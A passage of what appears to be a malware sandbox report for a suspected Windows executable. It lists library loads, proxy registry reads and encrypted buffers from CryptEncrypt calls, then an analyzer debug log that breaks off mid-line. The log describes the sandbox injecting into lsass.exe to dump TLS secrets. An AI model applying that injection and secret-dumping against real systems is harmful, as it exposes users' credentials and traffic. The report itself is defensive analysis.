"pathtofile": null, + "moduleaddress": "0x6db80000" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,844", + "eid": 74, + "data": { + "file": "DDRAW.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,844", + "eid": 75, + "data": { + "file": "D3D8.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,844", + "eid": 76, + "data": { + "file": "D3D9.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,860", + "eid": 77, + "data": { + "file": "DDRAW.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,860", + "eid": 78, + "data": { + "file": "D3D8.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,860", + "eid": 79, + "data": { + "file": "D3D9.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,860", + "eid": 80, + "data": { + "file": "DDRAW.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,860", + "eid": 81, + "data": { + "file": "D3D8.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,860", + "eid": 82, + "data": { + "file": "D3D9.DLL", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 22:33:24,860", + "eid": 83, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MigrateProxy", + "content": "1" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 22:33:24,860", + "eid": 84, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable", + "content": "0" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 22:33:24,860", + "eid": 85, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 22:33:24,860", + "eid": 86, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 22:33:24,860", + "eid": 87, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 22:33:24,860", + "eid": 88, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoDetect", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 22:33:24,860", + "eid": 89, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\WinHttpLowerCaseHost", + "content": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 22:33:24,860", + "eid": 90, + "data": { + "file": "C:\\Windows\\System32\\mswsock.dll", + "pathtofile": null, + "moduleaddress": "0x6db80000" + } + } + ], + "encryptedbuffers": [ + { + "process_name": "3937597df70645ac297e.exe", + "pid": 9436, + "api_call": "CryptEncrypt", + "buffer": "\\x15\\xcd\\x04\\xd8\\xa1\\xae\\xc9.b\\xd03\\xb5\\xd0\\x8e\\xab\\x9d\\xe2\\xa4=\\xbb\\xc2X\\x82\\x06\\x9e\\xa8\\xcc\\xf1\\xfe\\xbe\\xfa\r\\x84\\E\\xf1/\\xf8\\x9f\\xa9A\\x16\\xa2\\xaf\\xb8\\xc9\\x8d\\x12\\xff\\xf2\\xc1\\xb0J\\x04\\xaa\\x0b?I\\xe6\\xe5\\x0c\\xd3\\xc5\\xb3\\x82\\xba[3YG\\xe4\\x04\\x80@\\xbfnH\\xfexY{\\x93[\\xd5\\xa7/\\xf5\\x03\\xc6\\xd8\\xb6\\x12\\xc3\\x8f\\xba\\x81\\xdc\\xca\\xb7\\xaa\\xdb\\xdf\\xfe\\x8d\\xd8\\xfdTO\\x12\\x93!\\x15of]\\x15<\\xa1\\xfc\\xb6\\x91.\\x9c\\xd4\\xa1\\x17c\\xee\\xb7L\\xaf\\x18Y\\x85\\xb6<\\xe1\\x83b\\xf0\\xfbV\\x06\\x94\\xec\\x05]y\\xb3~k\\xc2\\x9d%!R5\\x11\\xc95\\x98 \\x12JQ\\xb1\\x90u\\xba6\\x8dA7\\x07\\xcb\\xe4U\\xfa\\xf1\\x9e\\xd8\\xea*H_I\\xb82\\xeb]\\xc9h\\xf4V\\xf0\\x996\\xaax\\x87\\xc3\\xdc\\xe6\\xf6\\xa7w<\\xdd\\x85}F\\xef\\x02P\\xf0m\\x1fi\\xa0\\x08\\xc6\\x9c\\x9bnz\\xad\\xae\\x9b\\x90\\xf5\\xca>\\xd2\\x1a\\xb36\\xa8\\xcd.2\\xabx\\x1b\\xe2\\xd6\\xadA\\xc7C\\xb68n\\x7fd\\xe8o", + "crypt_key": "0x04e240c0" + }, + { + "process_name": "3937597df70645ac297e.exe", + "pid": 9436, + "api_call": "CryptEncrypt", + "buffer": "[\\x1b\\x96 Y\\xed\\xaa\\xa8$\\x9fz\\xe5\t\\xd1]?\\xaf&\\xc3*-\\x154!\\x80\\xb7\\x83\\x14k\\x0f\\x98n\\xce!\\xcf\\xa9\\xc2c\\x02\\x06\\xe5/\\x81\\x8aU\\xdf\\x81X\\x13\\x95\\xf90\\xde\"E\\x8d\\xc7\\x91\\xa4\\x0fOq\\xcaW\\xcdP\\xadN\\x8f\\xbc\\xc9z\\x8d\\xe7\\xb2Q\\x1et\\x8d&\\x926\\xc5X\\xb1\\x8a\\xd8fX\\x84\\x9d\\xc3\\x1e\\xab\\\\xd9\\xa9'Q\\x8eh\\xab\\x11\\x1bY\\xaef\\x10\\xf3b\\xb8\\xf1\\x8bh\\xa3\\xbe2\\x0f<\\xae\\xa2\\xb0<\\xfdi\\x06\\x9c6\\xc4\\xa0\\xc9QiM\\xdd\\xbf\\x93\\xa3\\x00-\\x11VpB\\xa1r\\x0c-\\x84\\x8c\\xfb\\xfb\\x9a\\xc3T{\\x84\\xc4\\xae\\xc6)s%\\xc8\\xbf\\xf3p\\xd7\\xd8\\xc1\\xb3\\xf5/\\xf9\\xd7\\xee\\x97S,\\x11\\xcc\\xd2\\x8b\\xf9TV\\xccbJ1~\\x00\\xace-7\\x84\\xbd\t/qox\\x87\\x8f\\xf5\\x94\\xc2\\x87\\x9b[\\x8c3\\x10E\\x86\\xe1].\\xe1\\xcd\\xcd\\x1d\\x8f\\xf6m\"\\x8a\\x98\\xb2\\x95\\xbd\"\\xdc\\xa7\\xb7\\xf5\\xd5rn\\xfd\\xee\\xdd\\xdd>\\x10\\xd0\\xbf|\\x02\\xcd=\\x91\\xa6\\xef\\x97", + "crypt_key": "0x04e240c0" + }, + { + "process_name": "3937597df70645ac297e.exe", + "pid": 9436, + "api_call": "CryptEncrypt", + "buffer": "\\xa6\\xb5\\xcaCp\\xe2lO\\x10r\\xd9\\x81g\\xd3\\xd1\\xbe\\x8f\\xcc\\x82=\\xc7\\x03:\\xb0t+\\x19\\xe1\\xab\\xa5\\xb6\\xe4X\\x8f\\x86H\\x04\\xe1\\xc6\\x83\\xc2\\x05\\xb8Ln\\xdd\\x10\\xc5\\xf0\\x93\\x97\\x80\\x0e\\x86\\xc5\\x07\\x03\\xf9_\\x07\\xef\\x97j\\xec\\x1a\\x05\\xad\\x19\\xd1\\xd3\\x92\\\\x0f\\xc0\\x9d\\xca\\xcc\\x8a\\xf1\\xd0\\x93=\\xf7\\x00tX7Hw\\x93\\xfc\\x8a\\x90\\xa5\\xb8\\x18\\xf8\\x02\\x95\\x187\\xb4\\xe4\\xb2\\x03S\\xcd\\x14\\x9a@R\\xfe\\x11zl\\xe5\\xf8\\xf7\\xe7\\xc9n7\\xc7J\\x08\\x185\\x8b-\\xf3G\\xdcX\\x02\\xe4\\x008s\\xb2\n\\x10.\\xcf\\xf4H\\xb4\\xdd6dG\\xa4\\x10\\xa6\\x96d\\xf6\\xa7\\xaf\\xc3\\xeatL[\\xe7\\x93\\x1aN\\xff\\x88\\x96\\xdb\\xadn\\x88xLM\\xec\\x93\\xf9\\x8b\\x11:\\x05zvN\\x8b'\\x05\\x8f`\\xdc\\xf7\\xa8\\xd8\\xd79\\x14O\\x01\\xb9\\xde\\xff=\\xd2\\xc8\\x08\\xba\\xc1'\\xcc\\xfdV\\x11\\xd5\\x82gk`\\x8b\\xf8IwYm\\xa0H\\x0f\\x10\\xdc\\x90\\xca\t\\x8c\\x96a^\\x93\\x9aB\\x93\\x1fD\\xab\\xdd\\xc4\\x0e\\xdf\\xa8-F\\xae\\xcaX\\xb1", + "crypt_key": "0x04e240c0" + }, + { + "process_name": "3937597df70645ac297e.exe", + "pid": 9436, + "api_call": "CryptEncrypt", + "buffer": "\\xa6\\xb5\\xcaCp\\xe2lO\\x10r\\xd9\\x81g\\xd3\\xd1\\xbe\\x8f\\xcc\\x82=\\xc7\\x03:\\xb0t+\\x19\\xe1\\xab\\xa5\\xb6\\xe4X\\x8f\\x86H\\x04\\xe1\\xc6\\x83\\xc2\\x05\\xb8Ln\\xdd\\x10\\xc5\\xf7\\xeaz\\xb4\\x17\\xb0O\\x98Zx@?\\xfc\\x92C\\x1d\\x1fs=\\xbd\\x19\\x05\\x81\\x8f<5\\xd1?9\\x1c\\xcaI\\x9a\\xd1\\xb8#\\x92\\xc2\\xef\\xcd^\\x83\\xa1(\\x88\\\\x02-\\xc4?v\\xa2\\xc1Oq\\xb0\\xd4R\\x078\\xc01\\x94\\x06\\xbb\\xbej\\xf6\\xef\\xf8\\xf4\\x8b\\x01\\xd4\\x104\\xb1\\x97R\r\\x1fq\\x1b_9E\\x82\\x01\\xc7E\\xdc6\\x90\\xf2\\x93\\xd3\\xd4{L\\xa8\\x0e!\\xde\\x05u+\\xce\\xfe2\r\\xcf\\x11\\xc4\\x0cFq\\x145m\\x84\\x83\\xbdUy\\x01\\xf7$N\\x13\\xc8>\\x19S\\xaf`,Z\\xd7\\x06Z\\x85-=\\xcaX*\\xba\\x1cG\\x18\\xac)|a\\x82\\x1a\\x9d\\\\xe6nD\\xf0\\x8a-\\x89\\xe6%e\\xcc\\xe2\\xd5&\\x8f_\\xc6A\\x83R\\xfc\\xc5<\\xfe\\xfc\\x08!\\x05\\xe9\\x0c\\x9a[\\x18\\x86;\\x91.\\xca\\xc4\\x8d\\xe8\\\\xc5\\xaf\\xad\\xd8b\\x8c\\xba\\xe3", + "crypt_key": "0x04e240c0" + }, + { + "process_name": "3937597df70645ac297e.exe", + "pid": 9436, + "api_call": "CryptEncrypt", + "buffer": "\\xd5GY\\xc2\\xd7^\\x0b~r\\xef1\\xa5FWg`\\xb6\\xc9\\x1d\\xc2|\\x16\\x89\\xf6^O\\xfc\\xe4>UO\\xbc\\xa8\\x17D\\xbb\\xef\\x9d\\x82\\xff\\xf0\\x15\\xad\\xedd/\\xc44\\x16|\\xf0\\x84rJ\\xd78\n\\xd5\\x1b\\xa4x\\x82\\x03a\\x15\\x97\\x11\\xb9\\xdd)\\x12\\xed\\xd1:Z\\xf9\\x1b\\xa8l \\xe1\\xa9e\\xb68\\x9c\\xf5\\xabH\\xc0\\x9e]gq\\x04o/\\xde\n\\xa5\\xa2\\xab_Tz\\xfcV\\x00\\x8bJ\\x0ck[\\xe0\\xfa\\xe2|#J\\xf5\\xba\\xd9\\x1d\\x9d5\\x13\\xa6\\xca\"\\x13\\x98\\x02T\\xbd7\\xed\\x1c\\xc0\\xe2\\xdc\\xe7\\x1a\\xe5k\\x16\\xb5\\xa8KHd]o\\x02\\xbc\\xd6\\x9e\\xf1u>^,hV\\xfa\\xa9\\x0f\\xdf\\x11\\xb7\\xa8N+_b\\x8dZ-cmCyYo\\x04\\xd5\"\\xa0\\xd1a\\xe7\\xe6\\x9f\\xa6\\x14\\xf36\\xac\\x95\t\\xd9\\xf6\\x8b\\x99\\xac\\xf1\\x19\\xa5\\xf4\\xb3\\xdd\\xd1i\\x8c[\n)\\x87W\\xf8#\\x8f\\x12OE\\xba\\xc5\\xb4\\x1bQ\\xc2\\x14\\x9d\\x1c\t\\xe59\\x12CY.O\\xd0D\\x80\\x06\\x0f\\xfc\\xfc\\x890\\\\x06c\\x1cZ\\xaa", + "crypt_key": "0x04e240c0" + }, + { + "process_name": "3937597df70645ac297e.exe", + "pid": 9436, + "api_call": "CryptEncrypt", + "buffer": "\\x87JT\\xa6\\x16\\x00\\x185\\x97\\xa9n1WH0\\x9e)e\\xc2m/u?\\xfe\\x84\\x9f\\xf5\\xd1}\\xdb\\x9bdd\\x83\\xa6|\\xe4\\xe8\\xe0\\xac\\xdc\\xb3\\xc9\\xe9l\\xb9\\xbe\n\\xb39\\xd5\\x17\\xe1\\x9c\\x9di\\x8e\\x08\\xdc\\xc2U?\\xceP\\xde\\xfc\\xf9\\x8b\\x0e\\x17\\xcb \\xbf\\x10}\\xa2\\x85\\x0eMisF\\x08\\\\xfc\\xacO\\xe0\\xb4p-]\\x1d\\x11\\xe3\\xbfl\\x9f\\x18\\x8b\\x9e\\xd0\\xd9 o0\\xa2\\xab.\\xc3\\xad\\x16\\x97\\x87\\x0f\\xf1\\xe4\\xc0>\\x97$\\xf2\\xd1p\\xd9Fk\\xa6\\xd6\\x87\\xd2\\xdb\\x1c\\xf3_\\xc99\\xf4\\xa86\\xaey\\x19T\r\\xab\\xbf\\xfb\\xe6\\x17\\x90\\x12P\\x7fn\\xc7\rE|\\xb7\\xb8uV\\xd3\\xabt\\x0bV&\\xa8\\x7f\\xa9m\\xd4\\xca\\xa3\\xc0\\xdd\\xbb}F\\xafN\\x01\\xe2D\\xd6\\x13: \\x14W_#?\\xe0{iDU)\\xda\\x06\\x1a\\xbf&YP\\x96\\xca\\xe95B\\x0c\\xbe:FPh$\\xb9\\xf5\\xa8\\x80\\x07\\xeb\\xe6qZ\\x19|>\\xf3\\x1b\\x13,P\\x01\\x85\\xae-\\xfbB\\x04\\xaf\\x86\\xaf\\x8b\\xf3*\\xb6\\xe7t\\x16\\xcc", + "crypt_key": "0x04e240c0" + }, + { + "process_name": "3937597df70645ac297e.exe", + "pid": 9436, + "api_call": "CryptEncrypt", + "buffer": "`{z:k7\\x1e`\\xcd\\xf9~\\x19\\x14\\x03lc\\xbeo_\\xb9\\xbd\\xd8\\x99!/8N\\xcfktc?q=-\\xffXp8\\xcb\\xb5\\xea\\xe38\\xf4\\x8b\\x91\\xec\\x06\\xc2\\x98t\\x9d2d\\xd7\\xc4\\xdd\\xe8\\xd6\\xf6\\xa27>z\\xd5\\xd7\\x1b\r+\\x15\\x8d;n\\x9e6k\\xd7y^\\x07\\x03rA>\\xbd\\x83\\xf7\\xe7\\x13\\xc6I\\x929\\xf5\\x1b)\\xf4\\xf8d\\xbd\\x88{\\xa8\\xe1\\xeb:J\\x8b\\xc4#\\xd2r\\xf2\\xd7N\\x93\\xd1\\x9c\\xa0x\\xb6\\x16\\xa3\\xdb`\\x8c@H&\\x9fv\\xad\\xc1\\xd2\\x01\\xbeQ\\xc6(0#g\\xec\\xc3\\x0e \\x86\\x104\\xb9vd\\xb3.\\x18\\x8cA\\x1bE\\xc4o\\xaf\\xfc\r\\x90\\x07\\x9b6[\\xeb\\x05sc\\x86\\xa6\\x86\\xb3\\xb8s\\x98\\xe9\\xed\\xbd\\xc3\\x811\\x7f\\xd1q\\x0c\\xe8\\xd4\\xd2\\x1f\\xc6\\x06\\xaaf\\xd9-\\xc6S\\xeb\\xaf\\xcf\\xfc!r\\x04\\xda>w\\xb9d[\\x0bz\\x88\\x16\\xb0C!\\x00\\x1a\\xe7\\xfcYD#\\xec\\x15,\\xc3~\\x10A\\xe5\\xff\\xa0u@1\\xfb[R\\xd2x\\x99\\xeb\\xe7\\x83\\xc8\\xe8\\xae", + "crypt_key": "0x04e240c0" + } + ] + }, + "debug": { + "log": "2025-02-13 13:27:44,223 [root] INFO: Date set to: 20250307T22:32:56, timeout set to: 180\n2025-03-07 22:32:57,010 [root] DEBUG: Starting analyzer from: C:\\tmp7wr5rocj\n2025-03-07 22:32:57,010 [root] DEBUG: Storing results at: C:\\FPRxphIYy\n2025-03-07 22:32:57,010 [root] DEBUG: Pipe server name: \\\\.\\PIPE\\OLDUIlrs\n2025-03-07 22:32:57,010 [root] DEBUG: Python path: C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32\n2025-03-07 22:32:57,010 [root] INFO: analysis running as an admin\n2025-03-07 22:32:57,010 [root] INFO: analysis package specified: \"exe\"\n2025-03-07 22:32:57,010 [root] DEBUG: importing analysis package module: \"modules.packages.exe\"...\n2025-03-07 22:32:57,010 [root] DEBUG: imported analysis package \"exe\"\n2025-03-07 22:32:57,010 [root] DEBUG: initializing analysis package \"exe\"...\n2025-03-07 22:32:57,010 [lib.common.common] INFO: wrapping\n2025-03-07 22:32:57,010 [lib.core.compound] INFO: C:\\Users\\pacop\\AppData\\Local\\Temp already exists, skipping creation\n2025-03-07 22:32:57,010 [root] DEBUG: New location of moved file: C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe\n2025-03-07 22:32:57,010 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option\n2025-03-07 22:32:57,010 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option\n2025-03-07 22:32:57,010 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option\n2025-03-07 22:32:57,010 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option\n2025-03-07 22:32:57,041 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.browser\"\n2025-03-07 22:32:57,041 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.digisig\"\n2025-03-07 22:32:57,057 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.disguise\"\n2025-03-07 22:32:57,057 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.human\"\n2025-03-07 22:32:57,104 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'\n2025-03-07 22:32:57,104 [lib.api.screenshot] ERROR: No module named 'PIL'\n2025-03-07 22:32:57,104 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.screenshots\"\n2025-03-07 22:32:57,119 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.tlsdump\"\n2025-03-07 22:32:57,119 [root] DEBUG: Initialized auxiliary module \"Browser\"\n2025-03-07 22:32:57,119 [root] DEBUG: attempting to configure 'Browser' from data\n2025-03-07 22:32:57,119 [root] DEBUG: module Browser does not support data configuration, ignoring\n2025-03-07 22:32:57,119 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.browser\"...\n2025-03-07 22:32:57,322 [root] DEBUG: Started auxiliary module modules.auxiliary.browser\n2025-03-07 22:32:57,322 [root] DEBUG: Initialized auxiliary module \"DigiSig\"\n2025-03-07 22:32:57,322 [root] DEBUG: attempting to configure 'DigiSig' from data\n2025-03-07 22:32:57,322 [root] DEBUG: module DigiSig does not support data configuration, ignoring\n2025-03-07 22:32:57,322 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.digisig\"...\n2025-03-07 22:32:57,322 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature\n2025-03-07 22:32:58,627 [modules.auxiliary.digisig] DEBUG: File is not signed\n2025-03-07 22:32:58,627 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json\n2025-03-07 22:32:58,627 [root] DEBUG: Started auxiliary module modules.auxiliary.digisig\n2025-03-07 22:32:58,627 [root] DEBUG: Initialized auxiliary module \"Disguise\"\n2025-03-07 22:32:58,627 [root] DEBUG: attempting to configure 'Disguise' from data\n2025-03-07 22:32:58,627 [root] DEBUG: module Disguise does not support data configuration, ignoring\n2025-03-07 22:32:58,627 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.disguise\"...\n2025-03-07 22:32:58,627 [modules.auxiliary.disguise] INFO: Disguising GUID to 13680f58-96bd-4fae-9539-0852fd701eb8\n2025-03-07 22:32:58,627 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise\n2025-03-07 22:32:58,627 [root] DEBUG: Initialized auxiliary module \"Human\"\n2025-03-07 22:32:58,627 [root] DEBUG: attempting to configure 'Human' from data\n2025-03-07 22:32:58,627 [root] DEBUG: module Human does not support data configuration, ignoring\n2025-03-07 22:32:58,629 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.human\"...\n2025-03-07 22:32:58,637 [root] DEBUG: Started auxiliary module modules.auxiliary.human\n2025-03-07 22:32:58,637 [root] DEBUG: Initialized auxiliary module \"Screenshots\"\n2025-03-07 22:32:58,637 [root] DEBUG: attempting to configure 'Screenshots' from data\n2025-03-07 22:32:58,637 [root] DEBUG: module Screenshots does not support data configuration, ignoring\n2025-03-07 22:32:58,637 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.screenshots\"...\n2025-03-07 22:32:58,681 [modules.auxiliary.screenshots] WARNING: Python Image Library is not installed, screenshots are disabled\n2025-03-07 22:32:58,681 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots\n2025-03-07 22:32:58,681 [root] DEBUG: Initialized auxiliary module \"TLSDumpMasterSecrets\"\n2025-03-07 22:32:58,681 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data\n2025-03-07 22:32:58,681 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring\n2025-03-07 22:32:58,681 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.tlsdump\"...\n2025-03-07 22:32:58,683 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 660\n2025-03-07 22:32:59,530 [lib.api.process] INFO: Monitor config for : C:\\tmp7wr5rocj\\dll\\660.ini\n2025-03-07 22:32:59,530 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor\n2025-03-07 22:32:59,530 [lib.api.process] INFO: 64-bit DLL to inject is C:\\tmp7wr5rocj\\dll\\tAZsJa.dll, loader C:\\tmp7wr5rocj\\bin\\AnZYiwof.exe\n2025-03-07 22:32:59,540 [root] DEBUG: Loader: Injecting process 660 with C:\\tmp7wr5rocj\\dll\\tAZsJa.dll.\n2025-03-07 22:32:59,544 [root] DEBUG: 660: Python path set to 'C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32'.\n2025-03-07 22:32:59,544 [root] INFO: Disabling sleep skipping.\n2025-03-07 22:32:59,549 [root] DEBUG: 660: TLS secret dump mode enabled.\n2025-03-07 22:32:59,555 [root] DEBUG: 660: RtlInsertInvertedFunctionTable 0x00007FFA1A78090E, LdrpInvertedFunctionTableSRWLock 0x00007FFA1A8DD510\n2025-03-07 22:32:59,555 [root] DEBUG: 660: Monitor initialised: 64-bit capemon loaded in process 660 at 0x00007FF9D7D90000, thread 8400, image base 0x00007FF786A90000, stack from 0x000000490DB73000-0x000000490DB80000\n2025-03-07 22:32:59,555 [root] DEBUG: 660: Commandline: C:\\Windows\\system32\\lsass.exe\n2025-03-07 22:32:59,571 [root] DEBUG: 660: Hooked 5 out of 5 functions\n2025-03-07 22:32:59,571 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-03-07 22:32:59,571 [root] DEBUG: Successfully injected DLL C:\\tmp7wr5rocj\\dll\\tAZsJa.dll.\n2025-03-07 22:32:59,573 [lib.api.process] INFO: Injected into 64-bit \n2025-03-07 22:32:59,573 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump\n2025-03-07 22:32:59,668 [root] DEBUG: 660: TLS 1.2 secrets logged to: C:\\FPRxphIYy\\tlsdump\\tlsdump.log\n2025-03-07 22:33:05,639 [root] INFO: Restarting WMI Service\n2025-03-07 22:33:05,693 [root] DEBUG: package modules.packages.exe does not support configure, ignoring\n2025-03-07 22:33:05,693 [root] WARNING: configuration error for package modules.packages.exe: error importing data.packages.exe: No module named 'data.packages'\n2025-03-07 22:33:05,693 [lib.core.compound] INFO: C:\\Users\\pacop\\AppData\\Local\\Temp already exists, skipping creation\n2025-03-07 22:33:05,693 [lib.api.process] INFO: Successfully executed process from path \"C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe\" with arguments \"\" with pid 9436\n2025-03-07 22:33:05,693 [lib.api.process] INFO: Monitor config for : C:\\tmp7wr5rocj\\dll\\9436.ini\n2025-03-07 22:33:05,723 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp7wr5rocj\\dll\\EuicVyVA.dll, loader C:\\tmp7wr5rocj\\bin\\eQVqHhJ.exe\n2025-03-07 22:33:05,737 [root] DEBUG: Loader: Injecting process 9436 (thread 9440) with C:\\tmp7wr5rocj\\dll\\EuicVyVA.dll.\n2025-03-07 22:33:05,747 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-03-07 22:33:05,747 [root] DEBUG: Successfully injected DLL C:\\tmp7wr5rocj\\dll\\EuicVyVA.dll.\n2025-03-07 22:33:05,747 [lib.api.process] INFO: Injected into 32-bit \n2025-03-07 22:33:07,766 [lib.api.process] INFO: Successfully resumed \n2025-03-07 22:33:07,782 [root] DEBUG: 9436: Python path set to 'C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32'.\n2025-03-07 22:33:07,782 [root] INFO: Disabling sleep skipping.\n2025-03-07 22:33:07,782 [root] DEBUG: 9436: Dropped file limit defaulting to 100.\n2025-03-07 22:33:07,835 [root] DEBUG: 9436: YaraInit: Compiled 41 rule files\n2025-03-07 22:33:07,851 [root] DEBUG: 9436: YaraInit: Compiled rules saved to file C:\\tmp7wr5rocj\\data\\yara\\capemon.yac\n2025-03-07 22:33:07,851 [root] DEBUG: 9436: YaraScan: Scanning 0x00400000, size 0xc1c79\n2025-03-07 22:33:07,851 [root] DEBUG: 9436: AmsiDumper initialised.\n2025-03-07 22:33:07,851 [root] DEBUG: 9436: Monitor initialised: 32-bit capemon loaded in process 9436 at 0x73f70000, thread 9440, image base 0x400000, stack from 0x193000-0x1a0000\n2025-03-07 22:33:07,851 [root] DEBUG: 9436: Commandline: \"C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe\"\n2025-03-07 22:33:07,882 [root] DEBUG: 9436: hook_api: LdrpCallInitRoutine export address 0x77062A30 obtained via GetFunctionAddress\n2025-03-07 22:33:07,898 [root] DEBUG: 9436: hook_api: Warning - SetWindowLongW export address 0x76B95C00 differs from GetProcAddress -> 0x74275AE0 (apphelp.dll::0x35ae0)\n2025-03-07 22:33:07,898 [root] DEBUG: 9436: hook_api: Warning - EnumDisplayDevicesA export address 0x76B89D30 differs from GetProcAddress -> 0x74276880 (apphelp.dll::0x36880)\n2025-03-07 22:33:07,898 [root] DEBUG: 9436: hook_api: Warning - EnumDisplayDevicesW export address 0x76BA0340 differs from GetProcAddress -> 0x7429F2F0 (apphelp.dll::0x5f2f0)\n2025-03-07 22:33:07,936 [root] WARNING: b'Unable to place hook on GetCommandLineA'\n2025-03-07 22:33:07,936 [root] DEBUG: 9436: set_hooks: Unable to hook GetCommandLineA\n2025-03-07 22:33:07,936 [root] WARNING: b'Unable to place hook on GetCommandLineW'\n2025-03-07 22:33:07,936 [root] DEBUG: 9436: set_hooks: Unable to hook GetCommandLineW\n2025-03-07 22:33:07,951 [root] DEBUG: 9436: Hooked 611 out of 613 functions\n2025-03-07 22:33:07,951 [root] DEBUG: 9436: Syscall hook installed, syscall logging level 1\n2025-03-07 22:33:07,951 [root] DEBUG: 9436: WoW64fix: Windows version 6.2 not supported.\n2025-03-07 22:33:07,951 [root] INFO: Loaded monitor into process with pid 9436\n2025-03-07 22:33:07,967 [root] DEBUG: 9436: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::NtQueryLicenseValue returns to 0x0040B890, thread 9440).\n2025-03-07 22:33:07,967 [root] DEBUG: 9436: YaraScan: Scanning 0x00400000, size 0xc1c79\n2025-03-07 22:33:07,967 [root] DEBUG: 9436: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)\n2025-03-07 22:33:07,967 [root] DEBUG: 9436: DLL loaded at 0x73D00000: C:\\Windows\\system32\\uxtheme (0x74000 bytes).\n2025-03-07 22:33:07,967 [root] DEBUG: 9436: DLL loaded at 0x76090000: C:\\Windows\\System32\\bcryptPrimitives (0x5f000 bytes).\n2025-03-07 22:33:07,998 [root] DEBUG: 9436: InstrumentationCallback: Added region at 0x755A0000 to tracked regions list (thread 9440).\n2025-03-07 22:33:07,998 [root] DEBUG: 9436: DLL loaded at 0x75400000: C:\\Windows\\System32\\MSCTF (0xd4000 bytes).\n2025-03-07 22:33:08,014 [root] DEBUG: 9436: InstrumentationCallback: Added region at 0x760F0000 to tracked regions list (thread 9440).\n2025-03-07 22:33:08,014 [root] DEBUG: 9436: DLL loaded at 0x73AF0000: C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984\\comctl32 (0x210000 bytes).\n2025-03-07 22:33:08,036 [root] 